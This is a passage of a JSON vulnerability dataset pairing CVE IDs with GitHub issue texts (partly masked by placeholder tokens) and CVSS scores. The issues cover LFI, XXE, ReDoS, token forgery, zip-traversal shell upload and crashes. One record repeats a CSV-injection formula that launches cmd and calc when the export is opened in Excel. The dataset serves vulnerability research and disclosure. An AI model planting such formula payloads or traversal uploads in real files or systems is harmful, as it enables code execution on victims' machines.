  90268. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  90269. "severity": "MEDIUM",
  90270. "baseScore": 6.5,
  90271. "impactScore": 3.6,
  90272. "exploitabilityScore": 2.8
  90273. },
  90274. {
  90275. "CVE_ID": "CVE-2020-36052",
  90276. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/38",
  90277. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/38",
  90278. "Repo_new": "bg5sbk/minicms",
  90279. "Issue_Created_At": "2020-12-23T05:54:12Z",
  90280. "description": "an LFI loophole in FILETAG . In addition to FILETAG , there is also an LFI loophole in FILETAG FILETAG line NUMBERTAG index_file = PATHTAG require $index_file; line NUMBERTAG data = array( 'file' => $page_file, 'path' => $page_path, 'state' => $page_state, 'title' => $page_title, 'date' => $page_date, 'time' => $page_time, 'can_comment' => $page_can_comment, ); $index_file = PATHTAG require $index_file; $mc_pages FILETAG",
  90281. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90282. "severity": "CRITICAL",
  90283. "baseScore": 9.8,
  90284. "impactScore": 5.9,
  90285. "exploitabilityScore": 3.9
  90286. },
  90287. {
  90288. "CVE_ID": "CVE-2020-36184",
  90289. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2998",
  90290. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2998",
  90291. "Repo_new": "fasterxml/jackson-databind",
  90292. "Issue_Created_At": "2020-12-23T04:18:43Z",
  90293. "description": "Block NUMBERTAG more gadget types (placeholder). (note: placeholder until issue verified) Another gadget type(s) reported regarding class(es) of (withhold until fixed). library. See URLTAG for description of the general problem. Reporter(s): Al1ex MENTIONTAG Mitre id: (to be allocated) Fix will be included in NUMBERTAG usable via APITAG version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  90294. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90295. "severity": "HIGH",
  90296. "baseScore": 8.1,
  90297. "impactScore": 5.9,
  90298. "exploitabilityScore": 2.2
  90299. },
  90300. {
  90301. "CVE_ID": "CVE-2020-36186",
  90302. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2997",
  90303. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2997",
  90304. "Repo_new": "fasterxml/jackson-databind",
  90305. "Issue_Created_At": "2020-12-23T04:18:08Z",
  90306. "description": "Block NUMBERTAG more gadget types (placeholder NUMBERTAG note: placeholder until issue verified) Another gadget type(s) reported regarding class(es) of (withhold until fixed). library. See URLTAG for description of the general problem. Reporter(s): Al1ex MENTIONTAG Mitre id: (to be allocated) Fix will be included in NUMBERTAG usable via APITAG version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  90307. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90308. "severity": "HIGH",
  90309. "baseScore": 8.1,
  90310. "impactScore": 5.9,
  90311. "exploitabilityScore": 2.2
  90312. },
  90313. {
  90314. "CVE_ID": "CVE-2020-36188",
  90315. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2996",
  90316. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2996",
  90317. "Repo_new": "fasterxml/jackson-databind",
  90318. "Issue_Created_At": "2020-12-23T04:09:48Z",
  90319. "description": "Block NUMBERTAG more gadget types (placeholder). (note: placeholder until issue verified) Another gadget type(s) reported regarding class(es) of (withhold until fixed). library. See URLTAG for description of the general problem. Reporter(s): MENTIONTAG Mitre id: (to be allocated) Fix will be included in NUMBERTAG usable via APITAG version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  90320. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90321. "severity": "HIGH",
  90322. "baseScore": 8.1,
  90323. "impactScore": 5.9,
  90324. "exploitabilityScore": 2.2
  90325. },
  90326. {
  90327. "CVE_ID": "CVE-2020-36255",
  90328. "Issue_Url_old": "https://github.com/scottbrady91/IdentityModel/issues/4",
  90329. "Issue_Url_new": "https://github.com/scottbrady91/identitymodel/issues/4",
  90330. "Repo_new": "scottbrady91/IdentityModel",
  90331. "Issue_Created_At": "2020-08-22T12:40:16Z",
  90332. "description": "Unauthenticated ciphertext attackers can modify tokens. In extension of NUMBERTAG the current code in Branca allows attackers to modify any token's payload without invalidating the Poly NUMBERTAG authentication tag. The implementation fails to authenticate the ciphertext in APITAG at: CODETAG APITAG does not authenticate ciphertext . It writes the tag of the header into ciphertext . This is then later copied again to APITAG . The same issue is in APITAG . APITAG CODETAG Running it returns Tesu instead of Test .",
  90333. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  90334. "severity": "HIGH",
  90335. "baseScore": 7.5,
  90336. "impactScore": 3.6,
  90337. "exploitabilityScore": 3.9
  90338. },
  90339. {
  90340. "CVE_ID": "CVE-2020-36255",
  90341. "Issue_Url_old": "https://github.com/scottbrady91/IdentityModel/issues/3",
  90342. "Issue_Url_new": "https://github.com/scottbrady91/identitymodel/issues/3",
  90343. "Repo_new": "scottbrady91/IdentityModel",
  90344. "Issue_Created_At": "2020-08-22T12:39:05Z",
  90345. "description": "Poly NUMBERTAG key misuse attackers can forge authenticated tokens. In extension of NUMBERTAG the current code in Branca allows attackers to forge authenticated tokens, if a user uses any given key more than once ( see APITAG URLTAG . The issue lies in the use of the same key for both encryption and authentication of the token. CODETAG and APITAG This will automatically be fixed, if the Branca implementation adheres to the specification.",
  90346. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  90347. "severity": "HIGH",
  90348. "baseScore": 7.5,
  90349. "impactScore": 3.6,
  90350. "exploitabilityScore": 3.9
  90351. },
  90352. {
  90353. "CVE_ID": "CVE-2020-36320",
  90354. "Issue_Url_old": "https://github.com/vaadin/framework/issues/7757",
  90355. "Issue_Url_new": "https://github.com/vaadin/framework/issues/7757",
  90356. "Repo_new": "vaadin/framework",
  90357. "Issue_Created_At": "2016-07-19T08:14:53Z",
  90358. "description": "APITAG catastrophic exponential time regular expression. Originally by _jtomaszk_ ___ Class APITAG is using unsafe validation regex APITAG example of potential malicious input that validation never ends: APITAG related info [ URLTAG ___ Imported from FILETAG issue NUMBERTAG",
  90359. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90360. "severity": "HIGH",
  90361. "baseScore": 7.5,
  90362. "impactScore": 3.6,
  90363. "exploitabilityScore": 3.9
  90364. },
  90365. {
  90366. "CVE_ID": "CVE-2020-36503",
  90367. "Issue_Url_old": "https://github.com/Connections-Business-Directory/Connections/issues/474",
  90368. "Issue_Url_new": "https://github.com/connections-business-directory/connections/issues/474",
  90369. "Repo_new": "connections-business-directory/connections",
  90370. "Issue_Created_At": "2020-05-29T20:57:44Z",
  90371. "description": "Connections NUMBERTAG APITAG Export All feature Affected Version NUMBERTAG APITAG Wordpress NUMBERTAG Step to reproduce NUMBERTAG Login to your website NUMBERTAG isit URLTAG NUMBERTAG In the input filed add payload APITAG NUMBERTAG isit Connections Tools URLTAG and then click on Export All NUMBERTAG It will download a file APITAG open it with Microsoft Excel NUMBERTAG It will open CMD Exported CSV File APITAG APITAG APITAG APITAG APITAG Prefix APITAG Name APITAG Name APITAG Name APITAG Suffix APITAG APITAG APITAG APITAG First APITAG Last APITAG Address NUMBERTAG Line One APITAG Address NUMBERTAG Line Two APITAG Address NUMBERTAG Line Three APITAG Address NUMBERTAG Line Four APITAG Address NUMBERTAG District APITAG Address NUMBERTAG County APITAG Address NUMBERTAG City APITAG Address NUMBERTAG State APITAG Address NUMBERTAG Zipcode APITAG Address NUMBERTAG Country APITAG Address NUMBERTAG APITAG Address NUMBERTAG APITAG Address NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG Visibility|Im Uid|Im APITAG APITAG APITAG APITAG APITAG APITAG APITAG URL NUMBERTAG individual|public APITAG | APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| | | APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| | |public | | | | | | | | | | | | | | | | | | All fields are not checked because APITAG doesn't filter any of the fields. URLTAG Reference > OWASP CSV Injection URLTAG Hopefully, it will fix soon, Let me know if you have any questions. Thanks, APITAG",
  90372. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  90373. "severity": "HIGH",
  90374. "baseScore": 8.0,
  90375. "impactScore": 5.9,
  90376. "exploitabilityScore": 2.1
  90377. },
  90378. {
  90379. "CVE_ID": "CVE-2020-5261",
  90380. "Issue_Url_old": "https://github.com/Sustainsys/Saml2/issues/711",
  90381. "Issue_Url_new": "https://github.com/sustainsys/saml2/issues/711",
  90382. "Repo_new": "sustainsys/saml2",
  90383. "Issue_Created_At": "2017-05-09T17:07:47Z",
  90384. "description": "Reserved Issue . This is a dummy issue, just to reserve an issue number for a future time when a security issue is found or reported privately.",
  90385. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
  90386. "severity": "MEDIUM",
  90387. "baseScore": 6.8,
  90388. "impactScore": 5.2,
  90389. "exploitabilityScore": 1.6
  90390. },
  90391. {
  90392. "CVE_ID": "CVE-2020-5268",
  90393. "Issue_Url_old": "https://github.com/Sustainsys/Saml2/issues/712",
  90394. "Issue_Url_new": "https://github.com/sustainsys/saml2/issues/712",
  90395. "Repo_new": "sustainsys/saml2",
  90396. "Issue_Created_At": "2017-05-09T17:08:02Z",
  90397. "description": "Reserved Issue . This is a dummy issue, just to reserve an issue number for a future time when a security issue is found or reported privately.",
  90398. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
  90399. "severity": "HIGH",
  90400. "baseScore": 7.3,
  90401. "impactScore": 5.2,
  90402. "exploitabilityScore": 2.1
  90403. },
  90404. {
  90405. "CVE_ID": "CVE-2021-20199",
  90406. "Issue_Url_old": "https://github.com/containers/podman/issues/5138",
  90407. "Issue_Url_new": "https://github.com/containers/podman/issues/5138",
  90408. "Repo_new": "containers/podman",
  90409. "Issue_Created_At": "2020-02-09T22:06:10Z",
  90410. "description": "Source IP always APITAG in rootless Podman NUMBERTAG kind bug Description For a rootless container the source IP of incoming packets on a publish port is always APITAG . Even if the request is made from an external host. Steps to reproduce the issue NUMBERTAG Start a NGINX container: APITAG NUMBERTAG Make a request from another node. APITAG NUMBERTAG Look at the source ip of the request in NGINX stdout log: APITAG Describe the results you received: The logged source address is always APITAG Describe the results you expected: The logged source ip address to match the ip of the host the request was coming from. Additional information you deem important (e.g. issue happens only occasionally): In Podman NUMBERTAG this worked as expected. And it's probably related to: > Rootless Podman now uses Rootlesskit for port forwarding, which should greatly improve performance and capabilities Output of podman version : APITAG Output of APITAG : ERRORTAG Package info (e.g. output of APITAG or apt list podman ): APITAG Additional environment details (AWS, APITAG physical, etc.): Silverblue NUMBERTAG APITAG Edition)",
  90411. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  90412. "severity": "MEDIUM",
  90413. "baseScore": 5.9,
  90414. "impactScore": 3.6,
  90415. "exploitabilityScore": 2.2
  90416. },
  90417. {
  90418. "CVE_ID": "CVE-2021-22564",
  90419. "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/708",
  90420. "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/708",
  90421. "Repo_new": "libjxl/libjxl",
  90422. "Issue_Created_At": "2021-10-08T08:45:08Z",
  90423. "description": "Crash during multiple concurrent/parallel decoding. Hello, This crash occurs when a Qt application decode more JXL files at the same time via my qt jpegxl image plugin URLTAG During the crash I see following message: APITAG ERRORTAG Here is a simple console application I am able to reproduce crash easily: FILETAG How to compile and run: APITAG The application decodes bucuresti2.jxl file in two threads NUMBERTAG main thread NUMBERTAG worker thread). Each thread have different instance of the plug in and each plug in create own APITAG It may not crash during first iteration, but sooner or later it crashes. The output may run like this: CODETAG Sometime it crashes immediately: CODETAG When just one thread with plug in is running at a time, there is no crash.",
  90424. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  90425. "severity": "MEDIUM",
  90426. "baseScore": 5.5,
  90427. "impactScore": 3.6,
  90428. "exploitabilityScore": 1.8
  90429. },
  90430. {
  90431. "CVE_ID": "CVE-2021-23424",
  90432. "Issue_Url_old": "https://github.com/Tjatse/ansi-html/issues/19",
  90433. "Issue_Url_new": "https://github.com/tjatse/ansi-html/issues/19",
  90434. "Repo_new": "tjatse/ansi-html",
  90435. "Issue_Created_At": "2021-05-07T15:06:26Z",
  90436. "description": "Exponential APITAG Posting here as unable to contact maintainer. Doyensec Vulnerability Advisory Regular Expression Denial of Service APITAG in ansi html Affected Product: ansi html NUMBERTAG endor: URLTAG Severity: Low Vulnerability Class: Denial of Service Status: Open Author(s): Ben Caller APITAG SUMMARY The npm package ansi html uses a regular expression which is vulnerable to Regular Expression Denial of Service APITAG If an attacker provides a malicious string, ansi html will get stuck processing the input for an extremely long time. TECHNICAL DESCRIPTION The vulnerable regular expression is NUMBERTAG d+) m URLTAG Due to the APITAG part, this regular expression has catastrophic backtracking when given a long string of digits. The behaviour occurs as long as the digits are not followed immediately by an 'm'. The complexity is exponential: increasing the length of the malicious string by one makes processing take about twice as long. REPRODUCTION STEPS In nodejs, run: APITAG Notice that node hangs at NUMBERTAG CPU. Increasing the number of spaces increases the processing time. On my laptop that would take three minutes to complete, whereas APITAG would take just over one year to complete. REMEDIATION Remove the asterisk from the regular expression on line NUMBERTAG Doyensec APITAG is an independent security research and development company focused on vulnerability discovery and remediation. We work at the intersection of software development and offensive engineering to help companies craft secure code. Copyright NUMBERTAG by Doyensec LLC. All rights reserved. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given. The information in the advisory is believed to be accurate at the time of publishing based on currently available information, and it is provided as is, as a free service to the community by Doyensec LLC. There are no warranties with regard to this information, and Doyensec LLC does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.",
  90437. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90438. "severity": "HIGH",
  90439. "baseScore": 7.5,
  90440. "impactScore": 3.6,
  90441. "exploitabilityScore": 3.9
  90442. },
  90443. {
  90444. "CVE_ID": "CVE-2021-23463",
  90445. "Issue_Url_old": "https://github.com/h2database/h2database/issues/3195",
  90446. "Issue_Url_new": "https://github.com/h2database/h2database/issues/3195",
  90447. "Repo_new": "h2database/h2database",
  90448. "Issue_Created_At": "2021-10-22T07:07:50Z",
  90449. "description": "Report a H2 Database Engine SQLXML XXE vulnerability. Hello, I am threedr3am of APITAG Security Lab URLTAG ( EMAILTAG lub). We found a security vulnerability(SCSL NUMBERTAG in the H2 Database Engine jar URLTAG when using this component to connect to the h2 database , The returned data content field is parsed through SQLXML, which will cause the client XXE ( FILETAG Oracle mysql jdbc also recently fixed a similar security vulnerability, please refer to: URLTAG This is their fix commit: URLTAG vulnerability detail: When analyzing the data returned by the database, the APITAG class provides the APITAG method, which parses the string data into an object of the APITAG class. FILETAG When the object executes the APITAG APITAG method, if the input parameter is APITAG it will result in unprotected parsing of XML, resulting in XXE. FILETAG vulnerability reproduction NUMBERTAG The table exists in the database ERRORTAG NUMBERTAG There is data in the tb_test table CODETAG NUMBERTAG Query the database to return the message field and parse it through SQLXML CODETAG NUMBERTAG result FILETAG",
  90450. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  90451. "severity": "CRITICAL",
  90452. "baseScore": 9.1,
  90453. "impactScore": 5.2,
  90454. "exploitabilityScore": 3.9
  90455. },
  90456. {
  90457. "CVE_ID": "CVE-2021-25742",
  90458. "Issue_Url_old": "https://github.com/kubernetes/ingress-nginx/issues/7837",
  90459. "Issue_Url_new": "https://github.com/kubernetes/ingress-nginx/issues/7837",
  90460. "Repo_new": "kubernetes/ingress-nginx",
  90461. "Issue_Created_At": "2021-10-21T16:08:21Z",
  90462. "description": "CVETAG : Ingress nginx custom snippets allows retrieval of ingress nginx serviceaccount token and secrets across all namespaces. Issue Details A security issue was discovered in ingress nginx where a user that can create or update ingress objects can use the custom snippets feature to obtain all secrets in the cluster. This issue has been rated High ( PATHTAG URLTAG , and assigned CVETAG . Affected Components and Configurations This bug affects ingress nginx. Multitenant environments where non admin users have permissions to create Ingress objects are most affected by this issue. Affected Versions with no mitigation NUMBERTAG APITAG NUMBERTAG or NUMBERTAG Set allow snippet annotations URLTAG to false in your ingress nginx APITAG based on how you deploy ingress nginx: Static Deploy Files Edit the APITAG for ingress nginx after deployment: APITAG Add directive: APITAG CODETAG APITAG to false APITAG URLTAG URLTAG Detection If you find evidence that this vulnerability has been exploited, please contact security APITAG Additional Details See ingress nginx Issue NUMBERTAG for more details. Acknowledgements This vulnerability was reported by Mitch Hulscher. Thank You, CJ Cullen on behalf of the Kubernetes Security Response Committee",
  90463. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
  90464. "severity": "HIGH",
  90465. "baseScore": 7.1,
  90466. "impactScore": 4.2,
  90467. "exploitabilityScore": 2.8
  90468. },
  90469. {
  90470. "CVE_ID": "CVE-2021-27845",
  90471. "Issue_Url_old": "https://github.com/jasper-software/jasper/issues/194",
  90472. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/194",
  90473. "Repo_new": "jasper-software/jasper",
  90474. "Issue_Created_At": "2019-02-18T06:33:54Z",
  90475. "description": "bugs found by our bug scanner. Hi all, Our bug scanner has reported some bugs. Bug triggering files are attached. Bug NUMBERTAG div/mod zero NUMBERTAG in function APITAG , FILETAG ERRORTAG Divisor: rawsize Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , FILETAG CODETAG Divisor: cmpt >hstep, cmpt >vstep Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , FILETAG CODETAG CODETAG CODETAG Divisor: cmpt >hstep, cmpt >vstep Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , FILETAG APITAG Divisor: scale Result: Could be NUMBERTAG Please Check.",
  90476. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90477. "severity": "MEDIUM",
  90478. "baseScore": 5.5,
  90479. "impactScore": 3.6,
  90480. "exploitabilityScore": 1.8
  90481. },
  90482. {
  90483. "CVE_ID": "CVE-2021-32265",
  90484. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/545",
  90485. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/545",
  90486. "Repo_new": "axiomatic-systems/bento4",
  90487. "Issue_Created_At": "2020-08-22T01:47:18Z",
  90488. "description": "A global buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG mp NUMBERTAG aac (latest master NUMBERTAG b NUMBERTAG URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG show layout show samples show sample data APITAG APITAG output ERRORTAG POC FILETAG",
  90489. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90490. "severity": "HIGH",
  90491. "baseScore": 8.8,
  90492. "impactScore": 5.9,
  90493. "exploitabilityScore": 2.8
  90494. },
  90495. {
  90496. "CVE_ID": "CVE-2021-34128",
  90497. "Issue_Url_old": "https://github.com/bettershop/LaikeTui/issues/8",
  90498. "Issue_Url_new": "https://github.com/bettershop/laiketui/issues/8",
  90499. "Repo_new": "bettershop/laiketui",
  90500. "Issue_Created_At": "2021-05-28T16:10:44Z",
  90501. "description": "Compressed file upload getshell. The cause of the vulnerability: When decompressing, the compressed files were not filtered and judged, which resulted in the possibility of uploading cross directory zip files to getshell. FILETAG Vulnerability Recurrence:: Log in to the background and PATHTAG To upload a compressed file, put the malicious file that can be traversed into a zip, upload and decompress it. FILETAG FILETAG Then access the path of the malicious file: FILETAG poc\uff1a ERRORTAG Upload was successful and executed successfully!",
  90502. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  90503. "severity": "HIGH",
  90504. "baseScore": 8.8,
  90505. "impactScore": 5.9,
  90506. "exploitabilityScore": 2.8
  90507. },
  90508. {
  90509. "CVE_ID": "CVE-2021-34557",
  90510. "Issue_Url_old": "https://github.com/QubesOS/qubes-issues/issues/6595",
  90511. "Issue_Url_new": "https://github.com/qubesos/qubes-issues/issues/6595",
  90512. "Repo_new": "qubesos/qubes-issues",
  90513. "Issue_Created_At": "2021-05-11T00:39:44Z",
  90514. "description": "Xscreensaver dies unexpectedly, cannot lock screen . APITAG Qubes OS version APITAG NUMBERTAG Affected component(s) or functionality APITAG Screensaver, locking with Ctrl Alt L Brief summary APITAG Nothing happens when trying to lock the screen. No logs. Screensaver IS set to autostart already. And it works for some time. But after some time, (not sure about the exact cause), inactivity timer does not lock the screen, nor the screen lock shortcut works. When I open the Xfce Screensaver panel, it complains about the screensaver daemon being not running. Even after starting the daemon, same thing happens after some time. As there is no log at all, I cannot trace the cause. How Reproducible APITAG This started a few days ago, probably after applying a UEFI firmware update. The bug is always present since then, I guess. To Reproduce Steps to reproduce the behavior NUMBERTAG boot the system NUMBERTAG log in. do some work NUMBERTAG the computer won't lock when you expect it to lock its screen Expected behavior APITAG The lock should work. Actual behavior APITAG Lock is disabled Screenshots APITAG Additional context APITAG It might be considered a security issue as well, I did not notice that the screen was not locked but had the impression that it was. Solutions you've tried APITAG starting the xscreensaver using the respective xfce settings panel Relevant documentation URLTAG you've consulted APITAG Found some basic info that suggests to restart the screensaver, to put it into autostart (which already appears in session and startup panel as a ticked item) Related, non duplicate CVETAG issues APITAG (could not find any)",
  90515. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90516. "severity": "MEDIUM",
  90517. "baseScore": 4.6,
  90518. "impactScore": 3.6,
  90519. "exploitabilityScore": 0.9
  90520. },
  90521. {
  90522. "CVE_ID": "CVE-2021-36371",
  90523. "Issue_Url_old": "https://github.com/emissary-ingress/emissary/issues/3340",
  90524. "Issue_Url_new": "https://github.com/emissary-ingress/emissary/issues/3340",
  90525. "Repo_new": "emissary-ingress/emissary",
  90526. "Issue_Created_At": "2021-04-13T21:29:23Z",
  90527. "description": "Bypass mTLS by mixing SNI and Host headers. Describe the bug If Ambassador is deployed with multiple hosts/tlscontexts with some using mTLS ( APITAG ) and some not, it is possible to bypass the mTLS requirements for the backends that have it configured by sending an SNI for a APITAG that does not. I believe this stems from the fact that Ambassador matches APITAG based on SNI, but Mappings based on Host header. If APITAG does not require mTLS but APITAG does, it looks like its possible to talk directly to APITAG without a valid client certificate by doing something like: APITAG In some configurations it is also possible to do the same by just talking directly to the Ambassador APITAG IP address (not sending SNI at all). This works if the \"default\" APITAG does not require mTLS (I'm not exactly clear what APITAG Ambassador will fall back on if no SNI is given) To Reproduce I've put together a working minimal example with NUMBERTAG services and the YAML configurations: URLTAG ERRORTAG Expected behavior Ambassador should not apply a Host mapping if the SNI does not match. If this is expected behavior and you can't securely mix mTLS and non mTLS upstreams this should definitely be called out in the docs for those who need to rely on mTLS authentication. Versions (please complete the following information): Ambassador NUMBERTAG Kubernetes environment: EKS and APITAG Version NUMBERTAG and NUMBERTAG Additional context It is possible my configuration is bad/wrong, so if I have missed something in the docs please let me know",
  90528. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
  90529. "severity": "LOW",
  90530. "baseScore": 3.7,
  90531. "impactScore": 1.4,
  90532. "exploitabilityScore": 2.2
  90533. },
  90534. {
  90535. "CVE_ID": "CVE-2021-38244",
  90536. "Issue_Url_old": "https://github.com/cBioPortal/cbioportal/issues/8680",
  90537. "Issue_Url_new": "https://github.com/cbioportal/cbioportal/issues/8680",
  90538. "Repo_new": "cbioportal/cbioportal",
  90539. "Issue_Created_At": "2021-06-10T19:32:01Z",
  90540. "description": "[SECURITY] Denial of service because of unsafe regex processing. I have tried to contact you by EMAILTAG skcc.org and asked for any other email in URLTAG Nobody replied. The APITAG is vulnerable to regex injection that may lead to Denial of Service. User controlled heatmap and alteration are used to build and run a regex expression: URLTAG The value end up in APITAG URLTAG Since the attacker controls the string and the regex pattern he may cause a APITAG by regex catastrophic backtracking on the server side.",
  90541. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90542. "severity": "HIGH",
  90543. "baseScore": 7.5,
  90544. "impactScore": 3.6,
  90545. "exploitabilityScore": 3.9
  90546. },
  90547. {
  90548. "CVE_ID": "CVE-2021-40564",
  90549. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1898",
  90550. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1898",
  90551. "Repo_new": "gpac/gpac",
  90552. "Issue_Created_At": "2021-08-26T11:34:51Z",
  90553. "description": "Segmentation fault caused by null pointer dereference using mp4box in avc_parse_slice, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG bcd NUMBERTAG d in avc_parse_slice (svc_idr_flag=GF_FALSE, si NUMBERTAG fffffff NUMBERTAG avc NUMBERTAG ae NUMBERTAG bs NUMBERTAG df NUMBERTAG at PATHTAG NUMBERTAG gf_avc_parse_nalu (bs NUMBERTAG df NUMBERTAG avc NUMBERTAG ae NUMBERTAG at PATHTAG NUMBERTAG d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type NUMBERTAG size NUMBERTAG f, data NUMBERTAG e5b NUMBERTAG ct NUMBERTAG ada NUMBERTAG at PATHTAG NUMBERTAG naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~ The reason for this bug is that the program does not check the nullity of the pointer. APITAG",
  90554. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90555. "severity": "MEDIUM",
  90556. "baseScore": 5.5,
  90557. "impactScore": 3.6,
  90558. "exploitabilityScore": 1.8
  90559. },
  90560. {
  90561. "CVE_ID": "CVE-2021-40568",
  90562. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1900",
  90563. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1900",
  90564. "Repo_new": "gpac/gpac",
  90565. "Issue_Created_At": "2021-08-27T09:14:32Z",
  90566. "description": "Segmentation fault caused by buffer overflow using mp4box in svc_parse_slice, APITAG FILETAG (unzip first) Program output: ~~~~ APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! [AVC|H NUMBERTAG Warning: Error parsing NAL unit [AVC|H NUMBERTAG Error parsing Sequence Param Set [AVC|H NUMBERTAG Warning: Error parsing NAL unit [AVC|H NUMBERTAG Error parsing Sequence Param Set APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream 